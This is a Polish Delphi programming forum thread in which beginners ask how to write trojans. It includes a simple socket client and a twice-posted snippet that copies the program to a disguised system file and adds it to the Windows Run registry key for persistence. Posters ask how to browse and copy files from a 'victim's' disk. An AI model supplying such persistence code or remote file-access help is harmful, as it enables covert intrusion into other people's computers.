Jak macie problem z delphi to tutaj ->

FLEJA

Użytkownik
Dołączył
Marzec 9, 2003
Posty
253
Wprawdzie nie jestem tutaj aby szukac ale na www.4programmers.net jest ciekawy prosty trojan do ktorego jest dolaczona bardzo prosta do zrozumienia dokumentacja z opisem wszystkich komend w trojanie i sa wlasnie opisane komendy o ktore pytasz
smile.gif

Jeszcze raz polecam przegladanac www.4programmers.net gdzies tam w zrodelkach delphi znajdziesz... (tylko nie mowi ze nie znalazles bo musi tam byc)
A swoja droga piszesz ze dopiero zaczynasz uczyc sie programowac w delphi i rozpoczynasz od trojanow... troche dziwne ale uwazaj jak robisz, rob jak uwazasz ja w to nei wnikam.
 

Questor

Użytkownik
Dołączył
Październik 12, 2003
Posty
42
Na www.sasquach.prv.pl znalazlem dosyc latwy (z pozoru) przyklad jak napisac aplikacje klienta i serwera, tylko ze jest kilka bledow w kodzie klienta.

Troszke pozmienialem i wyglada to tak:

Kod:
unit Unit1;



interface



uses

  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,

  Dialogs, StdCtrls, ScktComp;



type

  TForm1 = class(TForm)

    edtAdres: TEdit;

    edtWiadomosc: TEdit;

    btnWyslij: TButton;

    btnPlik: TButton;

    Klient: TClientSocket;

    procedure btnWyslijClick(Sender: TObject);

    procedure btnPlikClick(Sender: TObject);

  private

    { Private declarations }

  public

    { Public declarations }

  end;



var

  Form1: TForm1;



implementation



{$R *.dfm}



procedure TForm1.btnWyslijClick(Sender: TObject);

  begin

  Klient.Host := edtAdres.Text;

  Klient.Active := True;

end;



procedure TForm1.btnPlikClick(Sender: TObject);

  var

  wiadomosc : string;

  begin

  wiadomosc := Form1.edtWiadomosc.Text;

  Klient.Socket.SendText(wiadomosc);



end;



end.

W "orginalnym" kodzie polaczenie i wyslanie komendy bylo pod pierwszym buttonem, a z tego co wyczytalem w opisie powinno byc polaczenie pod jednym a komenda pod drugim.
Jakos sobie to pozmienialem no i teraz dziala tak jak powinno :wink:
 

NeoX

Użytkownik
Dołączył
Czerwiec 19, 2004
Posty
28
Pomóżcie mi, potrzebuje komponentów tClientSocket i TSerwerSocket, a mam wersję delphi 7 personal w której tego nie ma. Podejrzewam że gdyby ktoś mi je wysłał via mail ([email protected]) to mógłbym je zainstalować bez problemu. Delphi 7 Architect nie wchodzi w gre...
 

lol_ek

Użytkownik
Dołączył
Maj 30, 2003
Posty
306
Originally posted by NeoX+--><div class='quotetop'>CYTAT(NeoX)</div>
Pomóżcie mi, potrzebuje komponentów tClientSocket i TSerwerSocket, a mam wersję delphi 7 personal w której tego nie ma. Podejrzewam że gdyby ktoś mi je wysłał via mail ([email protected]) to mógłbym je zainstalować bez problemu.[/b]

W miejscu instalacji jest katalog Bin w ktorym jest pakiet dclsockets70.bpl
Wspomniane komponenty mozna dodac za pomoca Instalatora pakietów ( zakładka Component )


<!--QuoteBegin-NeoX

Delphi 7 Architect nie wchodzi w gre...

No jeszcze tego by brakowało ... przeca to w pełni komercyjna edycja
 

DSTRCTR

Użytkownik
Dołączył
Lipiec 12, 2004
Posty
2
procedure TForm1.Button1Click(Sender: TObject);
var reg:tregistry;
begin
reg:=tregistry.create;
reg.RootKey := HKEY_CURRENT_USER;
reg.OpenKey('SOFTWAREMicrosoftWindowsCurrentVersionRun',True);
reg.WriteString('Zasobnik systemowy','c:systry.exe');
copyfile(pchar(paramstr(0)),pchar('c:systry.exe'),true);
BorderIcons := [biSystemMenu];


end;
-----------------
Moc rzygu
-----------------
 

DSTRCTR

Użytkownik
Dołączył
Lipiec 12, 2004
Posty
2
procedure TForm1.Button1Click(Sender: TObject);
var reg:tregistry;
begin
reg:=tregistry.create;
reg.RootKey := HKEY_CURRENT_USER;
reg.OpenKey('SOFTWAREMicrosoftWindowsCurrentVersionRun',True);
reg.WriteString('Zasobnik systemowy','c:systry.exe');
copyfile(pchar(paramstr(0)),pchar('c:systry.exe'),true);
BorderIcons := [biSystemMenu];


end;
------------------------
Moc rzygu
------------------------
 

Web&#39;s Slave

Użytkownik
Dołączył
Lipiec 30, 2004
Posty
1
2 problemy

1.Czy jeśli mój trojan działa w sieci domowej to czy będzie działał w sieci (jeśli nie to co mam zrobić aby działał? ).

2.Jak zrobić przesyłanie plików takie jakie jest w prosiaku??
 

lol_ek

Użytkownik
Dołączył
Maj 30, 2003
Posty
306
1. Teoretycznie tak.
2. Poczytac o Socketach, wysylanie strumienia itp.
Chyba najprostszym wyjściem jest zastosowanie komponentów do obsługi protokołu FTP
 

#Dzisiek

Użytkownik
Dołączył
Lipiec 31, 2004
Posty
6
Siec i Lan

Ja kozystam z Delphi 7 Personal i z Client i server socketow i skonczylem trojana. I mam pytanko czy jesli dziala mi na lanie to czy bedzie dzialal przez Neta?

Z ory THX
 

lol_ek

Użytkownik
Dołączył
Maj 30, 2003
Posty
306
Re: Siec i Lan

Originally posted by #Dzisiek
Ja kozystam z Delphi 7 Personal i z Client i server socketow i skonczylem trojana. I mam pytanko czy jesli dziala mi na lanie to czy bedzie dzialal przez Neta?

Z ory THX

Teoretycznie tak.
 

-=Eter=-

Użytkownik
Dołączył
Czerwiec 18, 2004
Posty
175
Re: Siec i Lan

Originally posted by #Dzisiek
Ja kozystam z Delphi 7 Personal i z Client i server socketow i skonczylem trojana. I mam pytanko czy jesli dziala mi na lanie to czy bedzie dzialal przez Neta?

Z ory THX
Będzie, będzie... tez takiego napisałem i wypróbowałem, wszystko było OK :-D
 

Kornik52

Były Moderator
Dołączył
Sierpień 12, 2004
Posty
848
Cześc pisze wlasnie trojana i mam pytanko jak napisać menadzera plików czyli takie cosk jak w prosiaku "ze widze caly dysk ofiary moge kopiowac z niego jaki kolwiek plik " jak to napisac a i nie muwice mitu o jakims 4programers.net bo sie wkurze !! to jest wkoncu forum a nie ze bedziecie mi podawac strony do kolejnych forum. I do jakis artykółów z których i tak nic nie zrozmie mogli byscie mi to napisac tu wlasnie na tym forum. Z góry dziękuję.
 

Plik

Użytkownik
Dołączył
Styczeń 3, 2004
Posty
319
hmm...ale ty go piszesz czy my?! ludzie daja ci wskazowki jak dotrzec do tego samemu troszke pokombinowac ... chcesz sie nauczyc czy wszytsko miec podane na tacyi tylko kopiowac... ?!?
 

daro0info

Użytkownik
Dołączył
Lipiec 27, 2004
Posty
28
To ja jeszcze dopowiem, że na pewno jak poszukasz spokojnie na 4programmers.net to na pewno znajdziesz... szukaj w artach, kodach źródłowych i komponentach... przeglądaj programy i ich źródła i sprawdź, czy któryś z nich nie ma tego co szukasz... ja w ten sposób znajduje tam co chce...

P.S.
Ile razy ja chciałem, żeby mi wykładano na tacę... w końcu sam znalazłem... :?
 

Kornik52

Były Moderator
Dołączył
Sierpień 12, 2004
Posty
848
Własnie niebede szukal tego bo szukalem tyle razy juz takie funkcje kombinowalem czytalem faqi i nic nie nadal bezsenswny blad w tym delphi mi wyskakuje ze nie moze czegos takiego uruchomic i potrzebuje sama taka funkcje napisana w delphi a nie z jakims trojanem bo nie dam rady poprostu szukam takiej funkci albo jakiegos dobrego faqa na ten temat nie muwcie mi juz o 4programers.net bo to ta strona to jest nie o trojanach ani takich sprawach tylko tam sa legalne programy qrcze ;] No i tu chyba to juz bedzie koniec kropka.
Nie rozumiecie ze z tej strony 4programers net o tych gniazdach to nic nie kapuje i dlatego che innego faqa ;asdf
 

NiuNio

Użytkownik
Dołączył
Listopad 18, 2002
Posty
953
Originally posted by Kornik52
Nie rozumiecie ze z tej strony 4programers net o tych gniazdach to nic nie kapuje i dlatego che innego faqa ;asdf
hehe cos jeszcze? przeciez nikt nie bedzie puisal artukolow calkowicie dla poczatkujacych ze masz nacisnac tu i tu... musisz tez sam sie postarac
smile.gif
 
Do góry Bottom